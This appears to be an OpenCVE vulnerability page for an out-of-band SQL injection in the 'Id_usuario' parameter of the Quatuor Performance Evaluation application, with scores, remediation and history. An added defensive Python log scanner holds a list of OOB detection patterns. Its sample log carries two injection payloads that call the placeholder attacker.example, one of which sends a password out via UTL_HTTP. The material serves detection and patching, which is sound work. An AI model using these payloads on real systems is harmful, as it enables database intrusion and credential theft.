Description
An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_evalua.aspx' could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Published: 2026-01-27
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Information Disclosure
Action: Update Immediately
AI Analysis

Impact

Out-of-band SQL injection (OOB SQLi) has been identified in the Quatuor Performance Evaluation (EDD) application. The vulnerability is triggered by manipulating the 'Id_usuario' parameter in the '/evaluacion_objetivos_anyo_sig_evalua.aspx' page, allowing an attacker to send malicious SQL queries that are executed against the database. The query results are sent to an external channel rather than being returned directly by the application, enabling the attacker to exfiltrate sensitive data and compromise database confidentiality.

Affected Systems

Releases of the Quatuor Performance Evaluation (EDD) application earlier than the vendor's latest version, dated November 12, 2025, are affected. NVD tracks the product under vendor 'quatuor', product 'evaluacion_de_desempeno', with no specific version range recorded (CPE version '-'), so any deployment that has not been updated to that release should be treated as vulnerable. The application is developed by Gabinete Técnico de Programación.

Risk and Exploitability

The vulnerability carries a CVSS 4.0 base score of 9.3 (critical); NVD's CVSS 3.1 assessment is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). Note that the CVSS 4.0 vector also rates integrity impact high (VI:H), while the description and the CVSS 3.1 vector scope the impact to confidentiality. The EPSS score is below 1% and the CVE is not listed in the CISA KEV catalog, so observed exploitation is currently unlikely. The vector (PR:N, UI:N) means an unauthenticated attacker can trigger the injection simply by sending a crafted request to the exposed parameter; no session or user interaction is required. Because the extracted data leaves through a channel opened by the database server itself (for example a DNS, SMB or HTTP callback) rather than in the HTTP response, exploitation need not produce visible application errors, which makes it harder to detect. High severity combined with trivial, unauthenticated exploitability (the SSVC assessment marks it 'Automatable: yes') argues for prompt patching despite the low EPSS.

Generated by OpenCVE AI on April 18, 2026 at 02:05 UTC.

Remediation

Vendor Solution

The vulnerability has been resolved in the latest version of the application, released on November 12, 2025; that release is no longer exploitable, earlier releases remain so.


OpenCVE Recommended Actions

  • Deploy the latest version of the Quatuor Performance Evaluation application, released on November 12, 2025, to remove the out-of-band SQL injection flaw.
  • If an upgrade is not immediately possible, enforce a strict allow-list on the 'Id_usuario' parameter of '/evaluacion_objetivos_anyo_sig_evalua.aspx' at a reverse proxy or WAF in front of the application (if the parameter is a numeric identifier, reject anything that is not a plain integer); the underlying fix for CWE-89 is to pass the value to the database through a parameterized query rather than string concatenation.
  • Monitor web server logs for requests to that page whose 'Id_usuario' value carries SQL syntax, and database logs and egress traffic for the channels OOB injection relies on: outbound DNS, SMB, HTTP or LDAP connections initiated by the database server. Blocking outbound connections from the database host at the firewall removes the exfiltration channel even if injection succeeds. Investigate any hits promptly.
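The following is an added example, not code from the OpenCVE page, INCIBE or the vendor, that implements the two interim measures above: the allow-list check for 'Id_usuario' (second bullet) and the web-log scan for OOB primitives (third bullet). It assumes 'Id_usuario' is a numeric user id and that the web server writes W3C extended (IIS-style) logs; neither is stated in the advisory. The DBMS behind the application is not named either, so the indicator list covers SQL Server, Oracle, MySQL and PostgreSQL primitives. The log lines are constructed samples and attacker.example is a placeholder.

```python
"""Interim checks for the Id_usuario OOB SQLi (added example, assumptions noted inline)."""
import re
from urllib.parse import parse_qs

VULN_PATH = "/evaluacion_objetivos_anyo_sig_evalua.aspx"
PARAM = "Id_usuario"

# Assumption: a legitimate Id_usuario is a short decimal integer.
ID_USUARIO_RX = re.compile(r"[0-9]{1,10}")

# Primitives that make the database server open a network connection of its own
# (DNS, SMB, HTTP or LDAP), i.e. the external channel OOB SQLi relies on.
# The advisory does not name the DBMS, so several families are covered.
OOB_INDICATORS = {
    "xp_dirtree": re.compile(r"\bxp_dirtree\b", re.I),            # SQL Server
    "xp_fileexist": re.compile(r"\bxp_fileexist\b", re.I),        # SQL Server
    "openrowset": re.compile(r"\bopen(rowset|datasource)\b", re.I),
    "unc_path": re.compile(r"\\\\[a-z0-9.-]+\\", re.I),          # \\host\share
    "utl_http": re.compile(r"\butl_http\b", re.I),                # Oracle
    "utl_inaddr": re.compile(r"\butl_inaddr\b", re.I),            # Oracle
    "dbms_ldap": re.compile(r"\bdbms_ldap\b", re.I),              # Oracle
    "load_file": re.compile(r"\bload_file\s*\(", re.I),           # MySQL
    "copy_program": re.compile(r"\bcopy\b.+\bprogram\b", re.I),   # PostgreSQL
}


def validate_id_usuario(value: str) -> bool:
    """Allow-list check to apply to Id_usuario (proxy/WAF rule or page handler)."""
    return ID_USUARIO_RX.fullmatch(value) is not None


def parse_w3c(lines):
    """Yield one dict per request line of a W3C extended log, mapping each
    space-separated column to the name given in the #Fields: directive."""
    fields = None
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("request line before #Fields: directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line; a real pipeline would count and alert on these
        yield dict(zip(fields, values))


def query_param(cs_uri_query: str, name: str):
    """URL-decoded values of one query parameter. The name is compared
    case-insensitively, as ASP.NET does; IIS logs an absent query string as '-'."""
    if cs_uri_query == "-":
        return []
    decoded = parse_qs(cs_uri_query, keep_blank_values=True)
    return [v for k, vals in decoded.items() if k.lower() == name.lower() for v in vals]


def oob_indicators(value: str):
    """Names of the OOB primitives present in a decoded parameter value."""
    return [name for name, rx in OOB_INDICATORS.items() if rx.search(value)]


def scan_log_lines(lines):
    """Flag requests to the vulnerable page whose Id_usuario fails the allow-list
    and annotate each with the OOB primitives it carries. An empty indicator list
    means some other non-numeric value, which still deserves a look."""
    findings = []
    for rec in parse_w3c(lines):
        if rec["cs-uri-stem"].lower() != VULN_PATH:
            continue
        for value in query_param(rec["cs-uri-query"], PARAM):
            if validate_id_usuario(value):
                continue
            findings.append({
                "time": f"{rec['date']} {rec['time']}",
                "client": rec["c-ip"],
                "status": rec["sc-status"],
                "value": value,
                "indicators": oob_indicators(value),
            })
    return findings


# Constructed sample log (not real traffic); attacker.example is a placeholder host.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2026-01-27 10:02:11 10.0.0.5 GET /evaluacion_objetivos_anyo_sig_evalua.aspx Id_usuario=1042 192.0.2.10 200
2026-01-27 10:02:15 10.0.0.5 GET /evaluacion_objetivos_anyo_sig_evalua.aspx Id_usuario=1042'%3Bexec+master..xp_dirtree+'%5C%5Cattacker.example%5Cx'-- 198.51.100.7 200
2026-01-27 10:02:19 10.0.0.5 GET /otra_pagina.aspx foo=bar 192.0.2.11 200
2026-01-27 10:02:22 10.0.0.5 GET /evaluacion_objetivos_anyo_sig_evalua.aspx id_usuario=7 192.0.2.12 200
2026-01-27 10:02:30 10.0.0.5 GET /Evaluacion_Objetivos_Anyo_Sig_Evalua.aspx Id_usuario=1%20union%20select%20UTL_HTTP.REQUEST('http://attacker.example/'||(select%20password%20from%20usuarios%20where%20rownum=1))%20from%20dual 198.51.100.7 500
""".splitlines()

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG):
        print(f["time"], f["client"], f["status"], f["indicators"], repr(f["value"]))
```

Note that the first suspicious request in the sample returns HTTP 200: an OOB payload that succeeds looks like a normal page load in the web log, which is why the scan keys on the parameter value rather than on the status code, and why egress monitoring from the database host is the complementary signal.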



Advisories

No advisories yet.

History

Each entry below lists the values added; no entry removed values.

Tue, 10 Feb 2026 20:30:00 +0000

  • CPEs added: cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*
  • Metrics added: cvssV3_1 {'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

Tue, 27 Jan 2026 20:30:00 +0000

  • First Time appeared: Quatuor; Quatuor evaluacion De Desempeno
  • Vendors & Products added: Quatuor; Quatuor evaluacion De Desempeno

Tue, 27 Jan 2026 19:15:00 +0000

  • Metrics added: ssvc {'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 27 Jan 2026 17:00:00 +0000

  • Description added: An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
  • Title added: Out-of-band SQL injection in Quatuor Performance Evaluation
  • Weaknesses added: CWE-89
  • References added: (none listed)
  • Metrics added: cvssV4_0 {'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-01-27T18:51:54.845Z

Reserved: 2026-01-27T09:25:56.882Z

Link: CVE-2026-1480

Vulnrichment

Updated: 2026-01-27T18:51:48.905Z

NVD

Status : Analyzed

Published: 2026-01-27T17:16:11.550

Modified: 2026-02-10T20:19:24.793

Link: CVE-2026-1480

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-18T02:15:05Z

Weaknesses